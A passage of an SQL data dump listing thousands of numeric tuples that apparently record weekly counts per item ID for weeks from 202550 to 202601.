4391,1,'202550',10),(4428,1,'202550',10),(4645,1,'202550',10),(4657,1,'202550',10),(4930,1,'202550',10),(5046,1,'202550',10),(5137,1,'202550',10),(5146,1,'202550',10),(5292,1,'202550',10),(5356,1,'202550',10),(5567,1,'202550',10),(5585,1,'202550',10),(473,1,'202550',11),(486,1,'202550',11),(1594,1,'202550',11),(1612,1,'202550',11),(2296,1,'202550',11),(3307,1,'202550',11),(3777,1,'202550',11),(4416,1,'202550',11),(4440,1,'202550',11),(4691,1,'202550',11),(4722,1,'202550',11),(4756,1,'202550',11),(5028,1,'202550',11),(5067,1,'202550',11),(5134,1,'202550',11),(5310,1,'202550',11),(5330,1,'202550',11),(5582,1,'202550',11),(5609,1,'202550',11),(488,1,'202550',12),(1728,1,'202550',12),(1737,1,'202550',12),(1774,1,'202550',12),(2309,1,'202550',12),(2801,1,'202550',12),(2809,1,'202550',12),(3045,1,'202550',12),(3229,1,'202550',12),(3721,1,'202550',12),(3752,1,'202550',12),(4323,1,'202550',12),(4529,1,'202550',12),(4668,1,'202550',12),(4750,1,'202550',12),(4771,1,'202550',12),(4977,1,'202550',12),(5058,1,'202550',12),(5062,1,'202550',12),(5101,1,'202550',12),(5125,1,'202550',12),(5248,1,'202550',12),(5264,1,'202550',12),(5307,1,'202550',12),(5433,1,'202550',12),(74,1,'202550',13),(110,1,'202550',13),(472,1,'202550',13),(1584,1,'202550',13),(2558,1,'202550',13),(3083,1,'202550',13),(3117,1,'202550',13),(4400,1,'202550',13),(5153,1,'202550',13),(5492,1,'202550',13),(1604,1,'202550',14),(1614,1,'202550',14),(1705,1,'202550',14),(2457,1,'202550',14),(2804,1,'202550',14),(3261,1,'202550',14),(3498,1,'202550',14),(4457,1,'202550',14),(4677,1,'202550',14),(4776,1,'202550',14),(4874,1,'202550',14),(5033,1,'202550',14),(5276,1,'202550',14),(5425,1,'202550',14),(5626,1,'202550',14),(1711,1,'202550',15),(1718,1,'202550',15),(1751,1,'202550',15),(2178,1,'202550',15),(2813,1,'202550',15),(3023,1,'202550',15),(3096,1,'202550',15),(3313,1,'202550',15),(4444,1,'202550',15),(4556,1,'202550',15),(4681,1,'202550',15),(4976,1,'202550',15),(5157,1,'202550',15),(5163,1,'202550',15),(5409,1,'202550',15),(5605,1,'202550',15),(1722,1,'202550',16),(1766,1,'202550',16),(3102,1,'202550',16),(3479,1,'202550',16),(4660,1,'202550',16),(4980,1,'202550',16),(5131,1,'202550',16),(2769,1,'202550',17),(3486,1,'202550',17),(4238,1,'202550',17),(5076,1,'202550',17),(5449,1,'202550',17),(5461,1,'202550',17),(5636,1,'202550',17),(108,1,'202550',18),(2297,1,'202550',18),(3038,1,'202550',18),(4983,1,'202550',18),(5259,1,'202550',18),(5464,1,'202550',18),(469,1,'202550',19),(1598,1,'202550',19),(1778,1,'202550',19),(4420,1,'202550',19),(4612,1,'202550',19),(5280,1,'202550',19),(5489,1,'202550',19),(5570,1,'202550',19),(1588,1,'202550',20),(5359,1,'202550',20),(5441,1,'202550',20),(481,1,'202550',21),(1610,1,'202550',21),(2904,1,'202550',21),(3297,1,'202550',21),(5512,1,'202550',21),(5515,1,'202550',21),(1600,1,'202550',22),(1724,1,'202550',22),(2658,1,'202550',22),(5436,1,'202550',22),(5598,1,'202550',22),(5400,1,'202550',23),(5412,1,'202550',24),(5454,1,'202550',24),(5593,1,'202550',24),(468,1,'202550',25),(5415,1,'202550',25),(5561,1,'202550',25),(5674,1,'202550',25),(1608,1,'202550',26),(3764,1,'202550',26),(5666,1,'202550',26),(5323,1,'202550',27),(5601,1,'202550',27),(1586,1,'202550',28),(5397,1,'202550',28),(4436,1,'202550',29),(335,1,'202550',31),(2503,1,'202550',31),(2775,1,'202550',31),(5578,1,'202550',31),(84,1,'202550',32),(474,1,'202550',34),(1602,1,'202550',34),(3060,1,'202550',34),(3253,1,'202550',34),(5428,1,'202550',35),(5502,1,'202550',35),(1544,1,'202550',36),(5457,1,'202550',36),(87,1,'202550',38),(467,1,'202550',38),(5406,1,'202550',38),(76,1,'202550',39),(5420,1,'202550',40),(89,1,'202550',42),(2704,1,'202550',42),(5662,1,'202550',42),(3781,1,'202550',44),(5683,1,'202550',55),(470,1,'202550',59),(91,1,'202550',60),(1582,1,'202550',62),(68,1,'202550',77),(72,1,'202550',85),(80,1,'202550',662),(9,1,'202550',3115),(3482,1,'202551',2),(482,1,'202551',3),(1726,1,'202551',3),(1741,1,'202551',3),(4657,1,'202551',3),(4747,1,'202551',3),(4756,1,'202551',3),(1697,1,'202551',4),(1737,1,'202551',4),(2993,1,'202551',4),(3096,1,'202551',4),(3104,1,'202551',4),(3251,1,'202551',4),(3257,1,'202551',4),(3498,1,'202551',4),(4387,1,'202551',4),(4396,1,'202551',4),(4424,1,'202551',4),(4440,1,'202551',4),(4897,1,'202551',4),(5334,1,'202551',4),(106,1,'202551',5),(472,1,'202551',5),(476,1,'202551',5),(479,1,'202551',5),(488,1,'202551',5),(1709,1,'202551',5),(1713,1,'202551',5),(1720,1,'202551',5),(2965,1,'202551',5),(2991,1,'202551',5),(3092,1,'202551',5),(3226,1,'202551',5),(3247,1,'202551',5),(3269,1,'202551',5),(3273,1,'202551',5),(3282,1,'202551',5),(3430,1,'202551',5),(3489,1,'202551',5),(3714,1,'202551',5),(4357,1,'202551',5),(4514,1,'202551',5),(4587,1,'202551',5),(4706,1,'202551',5),(4709,1,'202551',5),(4797,1,'202551',5),(4878,1,'202551',5),(4988,1,'202551',5),(5020,1,'202551',5),(5046,1,'202551',5),(5264,1,'202551',5),(5271,1,'202551',5),(478,1,'202551',6),(1590,1,'202551',6),(1592,1,'202551',6),(1711,1,'202551',6),(1715,1,'202551',6),(1718,1,'202551',6),(1724,1,'202551',6),(1751,1,'202551',6),(2154,1,'202551',6),(2165,1,'202551',6),(2748,1,'202551',6),(3090,1,'202551',6),(3097,1,'202551',6),(3245,1,'202551',6),(3249,1,'202551',6),(3271,1,'202551',6),(3278,1,'202551',6),(3541,1,'202551',6),(3727,1,'202551',6),(3738,1,'202551',6),(4301,1,'202551',6),(4329,1,'202551',6),(4363,1,'202551',6),(4368,1,'202551',6),(4412,1,'202551',6),(4428,1,'202551',6),(4444,1,'202551',6),(4448,1,'202551',6),(4546,1,'202551',6),(4591,1,'202551',6),(4648,1,'202551',6),(4674,1,'202551',6),(4700,1,'202551',6),(4703,1,'202551',6),(4744,1,'202551',6),(4762,1,'202551',6),(4862,1,'202551',6),(4893,1,'202551',6),(4976,1,'202551',6),(5131,1,'202551',6),(5157,1,'202551',6),(5256,1,'202551',6),(5289,1,'202551',6),(5295,1,'202551',6),(5301,1,'202551',6),(5310,1,'202551',6),(5320,1,'202551',6),(5363,1,'202551',6),(477,1,'202551',7),(1739,1,'202551',7),(1768,1,'202551',7),(1782,1,'202551',7),(2063,1,'202551',7),(2156,1,'202551',7),(2252,1,'202551',7),(2293,1,'202551',7),(2751,1,'202551',7),(3034,1,'202551',7),(3087,1,'202551',7),(3229,1,'202551',7),(3243,1,'202551',7),(3259,1,'202551',7),(3265,1,'202551',7),(3267,1,'202551',7),(3280,1,'202551',7),(3285,1,'202551',7),(3287,1,'202551',7),(3438,1,'202551',7),(3771,1,'202551',7),(4323,1,'202551',7),(4332,1,'202551',7),(4408,1,'202551',7),(4517,1,'202551',7),(4551,1,'202551',7),(4566,1,'202551',7),(4654,1,'202551',7),(4668,1,'202551',7),(4677,1,'202551',7),(4685,1,'202551',7),(4722,1,'202551',7),(4759,1,'202551',7),(4765,1,'202551',7),(4768,1,'202551',7),(4858,1,'202551',7),(4870,1,'202551',7),(4874,1,'202551',7),(4888,1,'202551',7),(5024,1,'202551',7),(5050,1,'202551',7),(5054,1,'202551',7),(5268,1,'202551',7),(5330,1,'202551',7),(480,1,'202551',8),(483,1,'202551',8),(484,1,'202551',8),(1745,1,'202551',8),(2178,1,'202551',8),(2296,1,'202551',8),(2558,1,'202551',8),(2964,1,'202551',8),(3027,1,'202551',8),(3107,1,'202551',8),(3240,1,'202551',8),(3316,1,'202551',8),(3479,1,'202551',8),(3721,1,'202551',8),(3742,1,'202551',8),(3746,1,'202551',8),(4326,1,'202551',8),(4377,1,'202551',8),(4432,1,'202551',8),(4436,1,'202551',8),(4608,1,'202551',8),(4681,1,'202551',8),(4802,1,'202551',8),(4996,1,'202551',8),(5042,1,'202551',8),(5058,1,'202551',8),(5101,1,'202551',8),(5122,1,'202551',8),(5140,1,'202551',8),(5153,1,'202551',8),(5307,1,'202551',8),(5425,1,'202551',8),(485,1,'202551',9),(487,1,'202551',9),(1730,1,'202551',9),(1732,1,'202551',9),(1747,1,'202551',9),(2150,1,'202551',9),(2248,1,'202551',9),(2609,1,'202551',9),(3045,1,'202551',9),(3079,1,'202551',9),(3261,1,'202551',9),(3263,1,'202551',9),(3313,1,'202551',9),(3531,1,'202551',9),(3534,1,'202551',9),(3777,1,'202551',9),(4275,1,'202551',9),(4338,1,'202551',9),(4373,1,'202551',9),(4382,1,'202551',9),(4404,1,'202551',9),(4454,1,'202551',9),(4520,1,'202551',9),(4524,1,'202551',9),(4542,1,'202551',9),(4582,1,'202551',9),(4660,1,'202551',9),(4663,1,'202551',9),(4691,1,'202551',9),(4694,1,'202551',9),(4750,1,'202551',9),(4792,1,'202551',9),(4883,1,'202551',9),(5071,1,'202551',9),(5080,1,'202551',9),(5137,1,'202551',9),(5146,1,'202551',9),(5253,1,'202551',9),(5298,1,'202551',9),(5326,1,'202551',9),(5383,1,'202551',9),(5585,1,'202551',9),(471,1,'202551',10),(481,1,'202551',10),(1600,1,'202551',10),(1612,1,'202551',10),(1699,1,'202551',10),(1705,1,'202551',10),(1770,1,'202551',10),(2148,1,'202551',10),(2658,1,'202551',10),(2809,1,'202551',10),(2911,1,'202551',10),(2989,1,'202551',10),(3005,1,'202551',10),(3041,1,'202551',10),(3066,1,'202551',10),(3072,1,'202551',10),(3102,1,'202551',10),(3124,1,'202551',10),(3275,1,'202551',10),(3724,1,'202551',10),(3752,1,'202551',10),(4335,1,'202551',10),(4416,1,'202551',10),(4420,1,'202551',10),(4556,1,'202551',10),(4741,1,'202551',10),(4771,1,'202551',10),(4977,1,'202551',10),(5037,1,'202551',10),(5134,1,'202551',10),(5353,1,'202551',10),(5472,1,'202551',10),(5582,1,'202551',10),(5609,1,'202551',10),(5666,1,'202551',10),(102,1,'202551',11),(1695,1,'202551',11),(1707,1,'202551',11),(1722,1,'202551',11),(1734,1,'202551',11),(1772,1,'202551',11),(1776,1,'202551',11),(2152,1,'202551',11),(2161,1,'202551',11),(2801,1,'202551',11),(3004,1,'202551',11),(3127,1,'202551',11),(3307,1,'202551',11),(3486,1,'202551',11),(3731,1,'202551',11),(3735,1,'202551',11),(3774,1,'202551',11),(4391,1,'202551',11),(4529,1,'202551',11),(4651,1,'202551',11),(5028,1,'202551',11),(5033,1,'202551',11),(5280,1,'202551',11),(5292,1,'202551',11),(5304,1,'202551',11),(5314,1,'202551',11),(5323,1,'202551',11),(5378,1,'202551',11),(5467,1,'202551',11),(5561,1,'202551',11),(473,1,'202551',12),(486,1,'202551',12),(1596,1,'202551',12),(1703,1,'202551',12),(1749,1,'202551',12),(1766,1,'202551',12),(1774,1,'202551',12),(1780,1,'202551',12),(2617,1,'202551',12),(2804,1,'202551',12),(3290,1,'202551',12),(3764,1,'202551',12),(4238,1,'202551',12),(4341,1,'202551',12),(4688,1,'202551',12),(4753,1,'202551',12),(5128,1,'202551',12),(5356,1,'202551',12),(5441,1,'202551',12),(5449,1,'202551',12),(5512,1,'202551',12),(5515,1,'202551',12),(5636,1,'202551',12),(1604,1,'202551',13),(1606,1,'202551',13),(1728,1,'202551',13),(3030,1,'202551',13),(3063,1,'202551',13),(3710,1,'202551',13),(4697,1,'202551',13),(4712,1,'202551',13),(4980,1,'202551',13),(5359,1,'202551',13),(5374,1,'202551',13),(5433,1,'202551',13),(5489,1,'202551',13),(2159,1,'202551',14),(2956,1,'202551',14),(4457,1,'202551',14),(4645,1,'202551',14),(5125,1,'202551',14),(5415,1,'202551',14),(5464,1,'202551',14),(5567,1,'202551',14),(5605,1,'202551',14),(5626,1,'202551',14),(1594,1,'202551',15),(1610,1,'202551',15),(1743,1,'202551',15),(3006,1,'202551',15),(3038,1,'202551',15),(4400,1,'202551',15),(5248,1,'202551',15),(5578,1,'202551',15),(5601,1,'202551',15),(5674,1,'202551',15),(110,1,'202551',16),(2457,1,'202551',16),(3023,1,'202551',16),(3083,1,'202551',16),(3749,1,'202551',16),(4776,1,'202551',16),(5492,1,'202551',16),(5593,1,'202551',16),(5662,1,'202551',16),(2503,1,'202551',17),(3117,1,'202551',17),(5067,1,'202551',17),(108,1,'202551',18),(1598,1,'202551',18),(2297,1,'202551',18),(3069,1,'202551',18),(3109,1,'202551',18),(3253,1,'202551',18),(3297,1,'202551',18),(4612,1,'202551',18),(4866,1,'202551',18),(5317,1,'202551',18),(5409,1,'202551',18),(5457,1,'202551',18),(468,1,'202551',19),(4930,1,'202551',19),(5076,1,'202551',19),(5276,1,'202551',19),(5400,1,'202551',19),(5461,1,'202551',19),(87,1,'202551',20),(335,1,'202551',20),(1608,1,'202551',20),(1701,1,'202551',20),(5412,1,'202551',20),(1614,1,'202551',21),(5436,1,'202551',21),(5598,1,'202551',21),(474,1,'202551',22),(570,1,'202551',22),(1778,1,'202551',22),(5163,1,'202551',22),(5259,1,'202551',22),(2309,1,'202551',23),(2904,1,'202551',23),(469,1,'202551',24),(1584,1,'202551',24),(2775,1,'202551',24),(1602,1,'202551',25),(5454,1,'202551',25),(91,1,'202551',26),(1588,1,'202551',26),(5420,1,'202551',26),(5570,1,'202551',26),(84,1,'202551',27),(1586,1,'202551',29),(4983,1,'202551',30),(5397,1,'202551',30),(74,1,'202551',31),(467,1,'202551',31),(5062,1,'202551',31),(76,1,'202551',32),(2704,1,'202551',32),(3060,1,'202551',32),(5406,1,'202551',32),(5502,1,'202551',32),(1544,1,'202551',33),(470,1,'202551',34),(5428,1,'202551',34),(2769,1,'202551',38),(3781,1,'202551',41),(89,1,'202551',44),(2813,1,'202551',45),(5683,1,'202551',52),(1582,1,'202551',61),(72,1,'202551',70),(68,1,'202551',91),(80,1,'202551',611),(9,1,'202551',2947),(106,1,'202552',1),(1709,1,'202552',1),(1772,1,'202552',1),(1732,1,'202552',2),(2165,1,'202552',2),(2248,1,'202552',2),(3229,1,'202552',2),(4700,1,'202552',2),(5301,1,'202552',2),(477,1,'202552',3),(488,1,'202552',3),(1743,1,'202552',3),(1749,1,'202552',3),(2296,1,'202552',3),(3063,1,'202552',3),(3104,1,'202552',3),(3109,1,'202552',3),(3245,1,'202552',3),(3247,1,'202552',3),(3249,1,'202552',3),(3275,1,'202552',3),(3280,1,'202552',3),(3534,1,'202552',3),(3771,1,'202552',3),(4357,1,'202552',3),(4368,1,'202552',3),(4373,1,'202552',3),(4546,1,'202552',3),(4587,1,'202552',3),(4677,1,'202552',3),(4792,1,'202552',3),(4883,1,'202552',3),(5295,1,'202552',3),(5304,1,'202552',3),(480,1,'202552',4),(482,1,'202552',4),(484,1,'202552',4),(486,1,'202552',4),(1596,1,'202552',4),(1701,1,'202552',4),(1707,1,'202552',4),(1734,1,'202552',4),(1770,1,'202552',4),(1776,1,'202552',4),(2154,1,'202552',4),(2156,1,'202552',4),(2161,1,'202552',4),(2252,1,'202552',4),(2558,1,'202552',4),(2991,1,'202552',4),(2993,1,'202552',4),(3079,1,'202552',4),(3243,1,'202552',4),(3265,1,'202552',4),(3269,1,'202552',4),(3282,1,'202552',4),(3287,1,'202552',4),(3498,1,'202552',4),(3731,1,'202552',4),(3735,1,'202552',4),(3777,1,'202552',4),(4363,1,'202552',4),(4408,1,'202552',4),(4416,1,'202552',4),(4428,1,'202552',4),(4454,1,'202552',4),(4457,1,'202552',4),(4524,1,'202552',4),(4542,1,'202552',4),(4685,1,'202552',4),(4691,1,'202552',4),(4697,1,'202552',4),(4765,1,'202552',4),(4768,1,'202552',4),(4776,1,'202552',4),(4797,1,'202552',4),(4858,1,'202552',4),(4866,1,'202552',4),(4878,1,'202552',4),(4897,1,'202552',4),(4996,1,'202552',4),(5028,1,'202552',4),(5037,1,'202552',4),(5058,1,'202552',4),(5122,1,'202552',4),(5353,1,'202552',4),(473,1,'202552',5),(476,1,'202552',5),(478,1,'202552',5),(479,1,'202552',5),(481,1,'202552',5),(1697,1,'202552',5),(1730,1,'202552',5),(1737,1,'202552',5),(1741,1,'202552',5),(1774,1,'202552',5),(2148,1,'202552',5),(2609,1,'202552',5),(3087,1,'202552',5),(3097,1,'202552',5),(3271,1,'202552',5),(3285,1,'202552',5),(3531,1,'202552',5),(3727,1,'202552',5),(3738,1,'202552',5),(3746,1,'202552',5),(3749,1,'202552',5),(3774,1,'202552',5),(4301,1,'202552',5),(4329,1,'202552',5),(4517,1,'202552',5),(4608,1,'202552',5),(4648,1,'202552',5),(4654,1,'202552',5),(4709,1,'202552',5),(4759,1,'202552',5),(4771,1,'202552',5),(4802,1,'202552',5),(4862,1,'202552',5),(4888,1,'202552',5),(5020,1,'202552',5),(5101,1,'202552',5),(5359,1,'202552',5),(1699,1,'202552',6),(1720,1,'202552',6),(1745,1,'202552',6),(1747,1,'202552',6),(1766,1,'202552',6),(1780,1,'202552',6),(2178,1,'202552',6),(3092,1,'202552',6),(3096,1,'202552',6),(3251,1,'202552',6),(3259,1,'202552',6),(3261,1,'202552',6),(3263,1,'202552',6),(3316,1,'202552',6),(3438,1,'202552',6),(3764,1,'202552',6),(4275,1,'202552',6),(4323,1,'202552',6),(4326,1,'202552',6),(4332,1,'202552',6),(4338,1,'202552',6),(4341,1,'202552',6),(4404,1,'202552',6),(4514,1,'202552',6),(4520,1,'202552',6),(4591,1,'202552',6),(4668,1,'202552',6),(4688,1,'202552',6),(4893,1,'202552',6),(4976,1,'202552',6),(5046,1,'202552',6),(5134,1,'202552',6),(5248,1,'202552',6),(5314,1,'202552',6),(5467,1,'202552',6),(5472,1,'202552',6),(471,1,'202552',7),(483,1,'202552',7),(1592,1,'202552',7),(1713,1,'202552',7),(1715,1,'202552',7),(1718,1,'202552',7),(1768,1,'202552',7),(2063,1,'202552',7),(2293,1,'202552',7),(2748,1,'202552',7),(2751,1,'202552',7),(2964,1,'202552',7),(2965,1,'202552',7),(3045,1,'202552',7),(3124,1,'202552',7),(3127,1,'202552',7),(3257,1,'202552',7),(3267,1,'202552',7),(3290,1,'202552',7),(3489,1,'202552',7),(3541,1,'202552',7),(3714,1,'202552',7),(3724,1,'202552',7),(3742,1,'202552',7),(4382,1,'202552',7),(4396,1,'202552',7),(4432,1,'202552',7),(4551,1,'202552',7),(4663,1,'202552',7),(4674,1,'202552',7),(4681,1,'202552',7),(4694,1,'202552',7),(4744,1,'202552',7),(4756,1,'202552',7),(4870,1,'202552',7),(4988,1,'202552',7),(5042,1,'202552',7),(5289,1,'202552',7),(5292,1,'202552',7),(5310,1,'202552',7),(5317,1,'202552',7),(5374,1,'202552',7),(5492,1,'202552',7),(485,1,'202552',8),(487,1,'202552',8),(1590,1,'202552',8),(1594,1,'202552',8),(1705,1,'202552',8),(1726,1,'202552',8),(1739,1,'202552',8),(2989,1,'202552',8),(3004,1,'202552',8),(3005,1,'202552',8),(3041,1,'202552',8),(3066,1,'202552',8),(3090,1,'202552',8),(3226,1,'202552',8),(3240,1,'202552',8),(3278,1,'202552',8),(3710,1,'202552',8),(3721,1,'202552',8),(4238,1,'202552',8),(4377,1,'202552',8),(4400,1,'202552',8),(4412,1,'202552',8),(4448,1,'202552',8),(4529,1,'202552',8),(4566,1,'202552',8),(4582,1,'202552',8),(4703,1,'202552',8),(4722,1,'202552',8),(4747,1,'202552',8),(5024,1,'202552',8),(5050,1,'202552',8),(5071,1,'202552',8),(5253,1,'202552',8),(5268,1,'202552',8),(5271,1,'202552',8),(5298,1,'202552',8),(5330,1,'202552',8),(5441,1,'202552',8),(5609,1,'202552',8),(5666,1,'202552',8),(102,1,'202552',9),(570,1,'202552',9),(1724,1,'202552',9),(2150,1,'202552',9),(2159,1,'202552',9),(2911,1,'202552',9),(2956,1,'202552',9),(3034,1,'202552',9),(3117,1,'202552',9),(3273,1,'202552',9),(3479,1,'202552',9),(3482,1,'202552',9),(3486,1,'202552',9),(4387,1,'202552',9),(4424,1,'202552',9),(4440,1,'202552',9),(4651,1,'202552',9),(4660,1,'202552',9),(5131,1,'202552',9),(5137,1,'202552',9),(5140,1,'202552',9),(5163,1,'202552',9),(5256,1,'202552',9),(5276,1,'202552',9),(5280,1,'202552',9),(5383,1,'202552',9),(5425,1,'202552',9),(5585,1,'202552',9),(1711,1,'202552',10),(1722,1,'202552',10),(1782,1,'202552',10),(2152,1,'202552',10),(2617,1,'202552',10),(3430,1,'202552',10),(4391,1,'202552',10),(4436,1,'202552',10),(4444,1,'202552',10),(4612,1,'202552',10),(4657,1,'202552',10),(4874,1,'202552',10),(4930,1,'202552',10),(4977,1,'202552',10),(4983,1,'202552',10),(5080,1,'202552',10),(5125,1,'202552',10),(5320,1,'202552',10),(5334,1,'202552',10),(5378,1,'202552',10),(5636,1,'202552',10),(87,1,'202552',11),(469,1,'202552',11),(1600,1,'202552',11),(1695,1,'202552',11),(1703,1,'202552',11),(1751,1,'202552',11),(2658,1,'202552',11),(2801,1,'202552',11),(3006,1,'202552',11),(3072,1,'202552',11),(3107,1,'202552',11),(4712,1,'202552',11),(4741,1,'202552',11),(4762,1,'202552',11),(5054,1,'202552',11),(5363,1,'202552',11),(5400,1,'202552',11),(5626,1,'202552',11),(335,1,'202552',12),(472,1,'202552',12),(1608,1,'202552',12),(2503,1,'202552',12),(2809,1,'202552',12),(3027,1,'202552',12),(3297,1,'202552',12),(3307,1,'202552',12),(4556,1,'202552',12),(5264,1,'202552',12),(5307,1,'202552',12),(5593,1,'202552',12),(1612,1,'202552',13),(1728,1,'202552',13),(3023,1,'202552',13),(3253,1,'202552',13),(3313,1,'202552',13),(4645,1,'202552',13),(4750,1,'202552',13),(5128,1,'202552',13),(5146,1,'202552',13),(5157,1,'202552',13),(1604,1,'202552',14),(1606,1,'202552',14),(1610,1,'202552',14),(2457,1,'202552',14),(3060,1,'202552',14),(3069,1,'202552',14),(3752,1,'202552',14),(4335,1,'202552',14),(5326,1,'202552',14),(5356,1,'202552',14),(5415,1,'202552',14),(5567,1,'202552',14),(74,1,'202552',15),(2297,1,'202552',15),(2309,1,'202552',15),(2775,1,'202552',15),(3038,1,'202552',15),(5259,1,'202552',15),(5449,1,'202552',15),(5561,1,'202552',15),(5662,1,'202552',15),(1586,1,'202552',16),(1614,1,'202552',16),(1778,1,'202552',16),(2769,1,'202552',16),(3030,1,'202552',16),(4753,1,'202552',16),(4980,1,'202552',16),(5153,1,'202552',16),(5461,1,'202552',16),(5601,1,'202552',16),(1602,1,'202552',17),(2704,1,'202552',17),(2804,1,'202552',17),(5076,1,'202552',17),(5582,1,'202552',17),(5598,1,'202552',17),(5674,1,'202552',17),(5409,1,'202552',18),(84,1,'202552',19),(468,1,'202552',19),(1584,1,'202552',19),(1598,1,'202552',19),(2813,1,'202552',19),(5515,1,'202552',19),(5605,1,'202552',19),(470,1,'202552',20),(1588,1,'202552',20),(3083,1,'202552',20),(5323,1,'202552',20),(5578,1,'202552',20),(5067,1,'202552',21),(5512,1,'202552',21),(5464,1,'202552',22),(5489,1,'202552',22),(91,1,'202552',23),(467,1,'202552',23),(5412,1,'202552',23),(5433,1,'202552',23),(5457,1,'202552',23),(108,1,'202552',24),(110,1,'202552',24),(3102,1,'202552',24),(5502,1,'202552',25),(5570,1,'202552',25),(89,1,'202552',26),(474,1,'202552',26),(2904,1,'202552',26),(5436,1,'202552',26),(76,1,'202552',27),(5454,1,'202552',27),(5428,1,'202552',30),(5033,1,'202552',31),(5397,1,'202552',32),(3781,1,'202552',33),(5406,1,'202552',38),(1582,1,'202552',39),(5683,1,'202552',40),(4420,1,'202552',43),(5420,1,'202552',44),(5062,1,'202552',46),(1544,1,'202552',49),(72,1,'202552',63),(68,1,'202552',77),(80,1,'202552',289),(9,1,'202552',2514),(4391,1,'202601',1),(5383,1,'202601',1),(1782,1,'202601',2),(2154,1,'202601',2),(2293,1,'202601',2),(2296,1,'202601',2),(3247,1,'202601',2),(3257,1,'202601',2),(4387,1,'202601',2),(4444,1,'202601',2),(4587,1,'202601',2),(4591,1,'202601',2),(4762,1,'202601',2),(5042,1,'202601',2),(5067,1,'202601',2),(106,1,'202601',3),(1699,1,'202601',3),(1701,1,'202601',3),(3265,1,'202601',3),(3267,1,'202601',3),(3269,1,'202601',3),(3316,1,'202601',3),(3438,1,'202601',3),(3774,1,'202601',3),(4404,1,'202601',3),(4514,1,'202601',3),(4551,1,'202601',3),(4747,1,'202601',3),(4756,1,'202601',3),(4797,1,'202601',3),(4862,1,'202601',3),(4870,1,'202601',3),(5080,1,'202601',3),(5140,1,'202601',3),(5253,1,'202601',3),(5326,1,'202601',3),(1695,1,'202601',4),(1697,1,'202601',4),(1709,1,'202601',4),(1713,1,'202601',4),(1743,1,'202601',4),(2148,1,'202601',4),(2159,1,'202601',4),(2748,1,'202601',4),(2801,1,'202601',4),(3092,1,'202601',4),(3096,1,'202601',4),(3226,1,'202601',4),(3245,1,'202601',4),(3263,1,'202601',4),(3271,1,'202601',4),(3285,1,'202601',4),(3430,1,'202601',4),(3482,1,'202601',4),(3714,1,'202601',4),(3752,1,'202601',4),(4396,1,'202601',4),(4412,1,'202601',4),(4448,1,'202601',4),(4648,1,'202601',4),(4674,1,'202601',4),(4709,1,'202601',4),(4858,1,'202601',4),(4883,1,'202601',4),(4888,1,'202601',4),(4897,1,'202601',4),(5024,1,'202601',4),(5046,1,'202601',4),(5071,1,'202601',4),(5146,1,'202601',4),(5163,1,'202601',4),(5256,1,'202601',4),(5264,1,'202601',4),(5289,1,'202601',4),(5374,1,'202601',4),(1720,1,'202601',5),(1726,1,'202601',5),(1728,1,'202601',5),(1768,1,'202601',5),(2063,1,'202601',5),(2150,1,'202601',5),(2156,1,'202601',5),(2165,1,'202601',5),(2248,1,'202601',5),(2558,1,'202601',5),(2989,1,'202601',5),(2991,1,'202601',5),(3041,1,'202601',5),(3087,1,'202601',5),(3240,1,'202601',5),(3249,1,'202601',5),(3251,1,'202601',5),(3735,1,'202601',5),(3771,1,'202601',5),(4323,1,'202601',5),(4357,1,'202601',5),(4368,1,'202601',5),(4373,1,'202601',5),(4454,1,'202601',5),(4546,1,'202601',5),(4566,1,'202601',5),(4608,1,'202601',5),(4651,1,'202601',5),(4654,1,'202601',5),(4657,1,'202601',5),(4703,1,'202601',5),(4744,1,'202601',5),(4768,1,'202601',5),(4874,1,'202601',5),(4988,1,'202601',5),(5128,1,'202601',5),(5137,1,'202601',5),(5248,1,'202601',5),(5310,1,'202601',5),(5472,1,'202601',5),(481,1,'202601',6),(1715,1,'202601',6),(1722,1,'202601',6),(1741,1,'202601',6),(1745,1,'202601',6),(1747,1,'202601',6),(1751,1,'202601',6),(1776,1,'202601',6),(2252,1,'202601',6),(3066,1,'202601',6),(3090,1,'202601',6),(3104,1,'202601',6),(3109,1,'202601',6),(3275,1,'202601',6),(3531,1,'202601',6),(3724,1,'202601',6),(3727,1,'202601',6),(4332,1,'202601',6),(4363,1,'202601',6),(4424,1,'202601',6),(4691,1,'202601',6),(4694,1,'202601',6),(4700,1,'202601',6),(4792,1,'202601',6),(4866,1,'202601',6),(4878,1,'202601',6),(4893,1,'202601',6),(5131,1,'202601',6),(5271,1,'202601',6),(5298,1,'202601',6),(5301,1,'202601',6),(5330,1,'202601',6),(5334,1,'202601',6),(5609,1,'202601',6),(102,1,'202601',7),(479,1,'202601',7),(1590,1,'202601',7),(1606,1,'202601',7),(1610,1,'202601',7),(1612,1,'202601',7),(1705,1,'202601',7),(1707,1,'202601',7),(1730,1,'202601',7),(1734,1,'202601',7),(1774,1,'202601',7),(2152,1,'202601',7),(2617,1,'202601',7),(2751,1,'202601',7),(2964,1,'202601',7),(2965,1,'202601',7),(3005,1,'202601',7),(3243,1,'202601',7),(3287,1,'202601',7),(3479,1,'202601',7),(3731,1,'202601',7),(3749,1,'202601',7),(4326,1,'202601',7),(4329,1,'202601',7),(4341,1,'202601',7),(4400,1,'202601',7),(4408,1,'202601',7),(4416,1,'202601',7),(4428,1,'202601',7),(4432,1,'202601',7),(4457,1,'202601',7),(4520,1,'202601',7),(4524,1,'202601',7),(4542,1,'202601',7),(4668,1,'202601',7),(4685,1,'202601',7),(4759,1,'202601',7),(4765,1,'202601',7),(4771,1,'202601',7),(4776,1,'202601',7),(4802,1,'202601',7),(5054,1,'202601',7),(5157,1,'202601',7),(5359,1,'202601',7),(482,1,'202601',8),(483,1,'202601',8),(485,1,'202601',8),(1718,1,'202601',8),(1739,1,'202601',8),(1780,1,'202601',8),(2911,1,'202601',8),(2956,1,'202601',8),(2993,1,'202601',8),(3063,1,'202601',8),(3069,1,'202601',8),(3079,1,'202601',8),(3117,1,'202601',8),(3124,1,'202601',8),(3127,1,'202601',8),(3278,1,'202601',8),(3280,1,'202601',8),(3489,1,'202601',8),(3534,1,'202601',8),(3541,1,'202601',8),(3738,1,'202601',8),(3777,1,'202601',8),(4517,1,'202601',8),(4660,1,'202601',8),(4677,1,'202601',8),(5020,1,'202601',8),(5037,1,'202601',8),(5101,1,'202601',8),(5125,1,'202601',8),(5276,1,'202601',8),(5295,1,'202601',8),(5304,1,'202601',8),(5317,1,'202601',8),(5353,1,'202601',8),(5415,1,'202601',8),(5636,1,'202601',8),(5666,1,'202601',8),(478,1,'202601',9),(1604,1,'202601',9),(1703,1,'202601',9),(1732,1,'202601',9),(1737,1,'202601',9),(1772,1,'202601',9),(2161,1,'202601',9),(2658,1,'202601',9),(3006,1,'